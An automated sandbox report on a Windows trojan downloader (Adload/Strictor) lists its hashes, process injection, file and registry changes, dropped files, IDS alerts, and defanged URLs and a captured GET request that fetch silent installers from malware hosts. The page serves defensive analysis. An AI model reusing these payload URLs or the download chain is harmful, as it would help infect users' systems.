Gen.Variant.Strictor.117797_10df3146c0

by malwarelabrobot on January 4th, 2017 in Malware Descriptions.

Gen:Variant.Strictor.117797 (BitDefender), TrojanDownloader:Win32/Adload.DP!bit (Microsoft), Trojan-Downloader.NSIS.Adload.bx (Kaspersky), Trojan.Vittalia.7648 (DrWeb), Gen:Variant.Strictor.117797 (B) (Emsisoft), Gen:Variant.Strictor.117797 (FSecure), Win32:PUP-gen [PUP] (Avast), Gen:Variant.Strictor.117797 (AdAware), Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, PUP


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 10df3146c0a7ee856b3a28aeab05763b
SHA1: e6a4379d914bb02b06c6b8762aa56ef715e73e8a
SHA256: 6383f6d5e086af1852fdbabf0de234d49b87f1d4a93fa5b7d14332422b474aa2
SSDeep: 49152:QqMbqd2g0pVv7eZ8Z8ZMzfGKnJM40OH5n:QQ30pllz9bn
Size: 1746052 bytes
File type: EXE
Platform: WIN32
Entropy: Probably Packed
PEID: UPolyXv05_v6
Company:
Created at: 2009-12-06 00:50:52
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

Setup__2140_il2.exe:292
LF4X4VJWFp.exe:2880
cpSetup.exe:1852

The Trojan injects its code into the following process(es):

Setup__2140_il2.exe:192
%original file name%.exe:2012

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process Setup__2140_il2.exe:292 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\main[1].htm (272 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A2LCUZKZ.txt (106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1V9Q60HH.txt (106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (6539 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\amipb[1].htm (272 bytes)

The process Setup__2140_il2.exe:192 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\index[1].htm (7551 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\amipb[1].htm (271 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\main[1].htm (272 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\main[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\amipb[1].htm (0 bytes)

The process %original file name%.exe:2012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\LF4X4VJWFp.exe (5293 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\586abfc3362cc[1].exe (3920 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\System.dll (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\U6cgvnDPb5 (192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\launch_reb[1].htm (192 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss2BE0.tmp (0 bytes)

The process LF4X4VJWFp.exe:2880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\NSISdl.dll (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A0B.tmp (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\nsArray.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\cpSetup.exe (93723 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe (58164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\706703874 (974 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\open.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\706703874 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd49FB.tmp (0 bytes)

The process cpSetup.exe:1852 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\normal_bg[1].jpg (1160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\appImg[1].jpg (4 bytes)

Registry activity

The process Setup__2140_il2.exe:292 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\vinyls.tramell]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
"(Default)" = "{a0e998a2-81f0-420b-a12b-563442cf5349}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
"(Default)" = "InstallerLib"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1479738615"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
"(Default)" = "vinyls.tramell.1"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]
"(Default)" = "vinyls.tramell"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe"

[HKCR\vinyls.tramell.1\CLSID]
"(Default)" = "{dded0858-104b-4eec-a82e-a44b49d78594}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"(Default)" = "{A0E998A2-81F0-420B-A12B-563442CF5349}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
"(Default)" = "IBoot"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
"(Default)" = "Inst Class"

[HKCR\vinyls.tramell.1]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 37 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
"(Default)" = "1.0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "B0 B0 50 65 7D 65 D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCR\vinyls.tramell\CurVer]
"(Default)" = "vinyls.tramell.1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
[HKCR\vinyls.tramell.1]
[HKCR\vinyls.tramell\CurVer]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Programmable]
[HKCR\vinyls.tramell.1\CLSID]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
[HKCR\vinyls.tramell]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable"

The process Setup__2140_il2.exe:192 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\vinyls.tramell]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
"(Default)" = "{a0e998a2-81f0-420b-a12b-563442cf5349}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
"(Default)" = "InstallerLib"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1479738615"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
"(Default)" = "vinyls.tramell.1"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]
"(Default)" = "vinyls.tramell"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe"

[HKCR\vinyls.tramell.1\CLSID]
"(Default)" = "{dded0858-104b-4eec-a82e-a44b49d78594}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"(Default)" = "{A0E998A2-81F0-420B-A12B-563442CF5349}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
"(Default)" = "IBoot"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
"(Default)" = "Inst Class"

[HKCR\vinyls.tramell.1]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
"(Default)" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "B0 B0 50 65 7D 65 D2 01"

[HKCR\vinyls.tramell\CurVer]
"(Default)" = "vinyls.tramell.1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process %original file name%.exe:2012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\10df3146c0a7ee856b3a28aeab05763b_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\10df3146c0a7ee856b3a28aeab05763b_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"
"WpadDecisionTime" = "00 0F D0 64 7D 65 D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\10df3146c0a7ee856b3a28aeab05763b_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\10df3146c0a7ee856b3a28aeab05763b_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\10df3146c0a7ee856b3a28aeab05763b_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\10df3146c0a7ee856b3a28aeab05763b_RASAPI32]
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\10df3146c0a7ee856b3a28aeab05763b_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "00 0F D0 64 7D 65 D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\10df3146c0a7ee856b3a28aeab05763b_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process cpSetup.exe:1852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1483361216"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "cpSetup.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "B0 B0 50 65 7D 65 D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 39 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

MD5 File path
45feac6677930552a91ea5e07b22525b c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\586abfc3362cc[1].exe
7caaf58a526da33c24cbe122e7839693 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\NSISdl.dll
c2c978b4b608c45c6bf61d68cdedaa0e c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe
89d40ecddf3ce6f3b0e6a84f40936912 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\nsArray.dll
45feac6677930552a91ea5e07b22525b c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\LF4X4VJWFp.exe
c17103ae9072a06da581dec998343fc1 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\System.dll
c498ae64b4971132bba676873978de1e c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\inetc.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 40960 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 233472 28056 28160 2.91371 1acd00482b089543b3dce3f299e3210a

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://dna4mm5c1mahl.cloudfront.net/launch_reb.php?p=sevenzip&tid=11671248&pid=2735&n=QWR2YW5jZWQgU3lzdGVtQ2FyZSBQcm8gMTAuMC4zLjY3MSBNdWx0aWxpbmd1YWwgKyBMaWNlbnNlIEtleXMgKyBQb3J0YWJsZQ==&b_typ=pe
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro 10.0.3.671 Multilingual + License Keys + Portable
hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=2735&tid=11671248&b_typ=pe&n=QWR2YW5jZWQgU3lzdGVtQ2FyZSBQcm8gMTAuMC4z&reb=1&ic=
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css 204.11.56.48
hxxp://cdn2.leadingdownload.com/V38/amipb.js 204.11.56.48
hxxp://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png 107.20.147.93
hxxp://www.secularistsarakolet.site/index.php 107.20.147.93
hxxp://get.enomenalco.club/launch_v5.php?p=sevenzip&pid=2735&tid=11671248&b_typ=pe&n=QWR2YW5jZWQgU3lzdGVtQ2FyZSBQcm8gMTAuMC4z&reb=1&ic= 205.251.219.6
hxxp://jump.meunidealized.bid/stub_maker.php?program=sevenzip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro 10.0.3.671 Multilingual + License Keys + Portable 205.251.219.212
hxxp://cdn1.leadingdownload.com/V38/amipb.js 204.11.56.48
hxxp://get.ercationiv.club/launch_reb.php?p=sevenzip&tid=11671248&pid=2735&n=QWR2YW5jZWQgU3lzdGVtQ2FyZSBQcm8gMTAuMC4zLjY3MSBNdWx0aWxpbmd1YWwgKyBMaWNlbnNlIEtleXMgKyBQb3J0YWJsZQ==&b_typ=pe 205.251.219.17


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE SoundCloud Downloader Install Beacon
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png HTTP/1.0
